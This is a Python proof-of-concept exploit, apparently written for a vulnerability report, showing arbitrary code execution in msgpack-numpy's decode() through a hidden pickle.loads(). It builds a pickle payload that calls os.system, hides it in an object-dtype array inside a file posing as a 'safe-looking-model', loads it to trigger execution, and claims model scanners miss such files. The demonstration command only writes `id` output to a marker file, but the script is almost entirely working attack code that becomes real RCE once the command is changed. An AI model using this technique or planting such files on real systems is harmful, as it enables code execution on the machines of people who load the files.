#!/usr/bin/env python3
"""
msgpack-numpy - Arbitrary Code Execution via Hidden pickle.loads()

WARNING: this is a proof-of-concept. Running it executes a shell command
(`id`, redirected to a marker file) on the local machine and writes files
under /tmp. Run it only in a disposable, isolated environment.

VULNERABILITY:
msgpack_numpy.decode() calls pickle.loads() on user-controlled data when
the serialized array has dtype kind 'O' (object). This enables arbitrary
code execution when loading any msgpack file that uses msgpack_numpy for
deserialization.

The vulnerable code in msgpack_numpy.py decode():

    if b'kind' in obj and obj[b'kind'] == b'O':
        return pickle.loads(obj[b'data'])

An attacker can craft a .msgpack file where any array field has kind='O'
and data=<pickle payload>, achieving RCE on deserialization.

This is particularly dangerous because:
1. MessagePack is considered a "safe" serialization format
2. Users expect msgpack files to contain only data, not executable code
3. The pickle.loads() call is hidden inside the msgpack extension hooks
4. No scanner (modelscan, picklescan) checks .msgpack files

Affected: msgpack-numpy <= 0.4.8 (all versions)
"""

import os
import pickle
import sys

import msgpack
import msgpack_numpy as m
import numpy as np

# File the demonstration payload writes to; its existence after loading is
# the evidence that code ran during deserialization.
MARKER_FILE = "/tmp/msgpack_numpy_rce_proof.txt"

# Where the crafted msgpack document is written. It is intentionally left on
# disk afterwards so the scanner commands printed in Step 6 can be tried.
MALICIOUS_PATH = "/tmp/malicious_model.msgpack"

# ============================================================
# Step 1: Show how msgpack_numpy normally works
# ============================================================
print("[*] Demonstrating normal msgpack_numpy usage...")
normal_data = {"weights": np.array([1.0, 2.0, 3.0], dtype=np.float32)}
packed_normal = msgpack.packb(normal_data, default=m.encode)
unpacked_normal = msgpack.unpackb(packed_normal, object_hook=m.decode, raw=False)
print(f"[+] Normal round-trip: {unpacked_normal}")

# ============================================================
# Step 2: Create a malicious payload
# ============================================================
print("\n[*] Creating malicious msgpack payload...")


class MaliciousPayload:
    """Object whose pickle form runs a harmless marker command when loaded."""

    def __reduce__(self):
        # pickle stores the (callable, args) pair returned here and invokes
        # it at load time, so unpickling calls os.system(cmd).
        cmd = (
            f"id > {MARKER_FILE} && "
            f"echo 'RCE via msgpack_numpy hidden pickle.loads' >> {MARKER_FILE}"
        )
        return (os.system, (cmd,))


malicious_pickle = pickle.dumps(MaliciousPayload())

# Craft the msgpack structure that triggers pickle.loads in decode()
# The decode function checks: b'nd' in obj AND obj[b'kind'] == b'O'
# Then calls: pickle.loads(obj[b'data'])
malicious_array = {
    b'nd': True,                # Marks this as an ndarray
    b'kind': b'O',              # Object dtype -> triggers pickle.loads()
    b'data': malicious_pickle,  # Pickle payload with RCE
    b'shape': (1,),             # Shape (cosmetic, not used before pickle.loads)
    b'type': b'O',              # Dtype descriptor (cosmetic)
}

# Embed in a realistic model structure
model_data = {
    "model_name": "safe-looking-model",
    "version": "1.0.0",
    "weights": malicious_array,  # <-- malicious
}

# use_bin_type=True keeps the bytes keys/values as msgpack "bin", so they
# come back as bytes (not str) when unpacked with raw=False.
packed = msgpack.packb(model_data, use_bin_type=True)

with open(MALICIOUS_PATH, 'wb') as f:
    f.write(packed)

print(f"[+] Malicious msgpack file saved to {MALICIOUS_PATH}")
print(f" File size: {len(packed)} bytes")

# ============================================================
# Step 3: Clean marker file
# ============================================================
# Remove any marker left by a previous run so Step 5 cannot report a stale
# result.
if os.path.exists(MARKER_FILE):
    os.remove(MARKER_FILE)

# ============================================================
# Step 4: Load the malicious file (triggers RCE)
# ============================================================
print("\n[*] Loading malicious msgpack with msgpack_numpy decoder...")
# SECURITY: object_hook=m.decode is the call under test; per the analysis in
# the module docstring it reaches pickle.loads() on attacker-controlled bytes.
with open(MALICIOUS_PATH, 'rb') as f:
    loaded = msgpack.unpackb(f.read(), object_hook=m.decode, raw=False)

print(f"[+] Loaded data keys: {list(loaded.keys()) if isinstance(loaded, dict) else type(loaded)}")

# ============================================================
# Step 5: Verify RCE
# ============================================================
if os.path.exists(MARKER_FILE):
    with open(MARKER_FILE) as f:
        content = f.read().strip()
    print("\n[!!!] ARBITRARY CODE EXECUTION CONFIRMED")
    print(f"[!!!] Marker file contents:\n{content}")
    os.remove(MARKER_FILE)
else:
    # Non-zero exit lets callers/CI distinguish "not reproduced" from success.
    print("\n[-] RCE marker file not found")
    sys.exit(1)

# ============================================================
# Step 6: Scanner evasion verification
# ============================================================
# NOTE: this script does not invoke modelscan or picklescan; the text below
# restates the author's claim and suggests commands to check it manually.
print("\n" + "="*60)
print("SCANNER EVASION")
print("="*60)
print(f"""
Neither modelscan nor picklescan scan .msgpack files at all.

  modelscan -p {MALICIOUS_PATH}
  # -> Skips file (unsupported format)

  picklescan -p {MALICIOUS_PATH}
  # -> Scanned files: 0, Infected files: 0

The pickle payload is embedded inside a msgpack structure,
completely invisible to all current model security scanners.
""")

print("="*60)
print("VULNERABILITY SUMMARY")
print("="*60)
# The fallback is the version named in the advisory text, not a detected
# value; it is only used when the module exposes no __version__ attribute.
library_version = getattr(m, '__version__', '0.4.8')
print(f"""
Library:     msgpack-numpy {library_version}
File:        msgpack_numpy.py, decode() function
Root cause:  pickle.loads(obj[b'data']) when obj[b'kind'] == b'O'
Trigger:     Any msgpack file loaded with object_hook=msgpack_numpy.decode
Attack:      Set array kind='O' and data=<pickle payload>
Impact:      Arbitrary code execution on file load

Scanners:
  modelscan  - NOT APPLICABLE (.msgpack not scanned)
  picklescan - NOT APPLICABLE (.msgpack not scanned)

Real-world usage:
  msgpack-numpy is used for ML data serialization, feature embeddings,
  and intermediate model storage. Any application loading untrusted
  .msgpack files with msgpack_numpy is vulnerable.
""")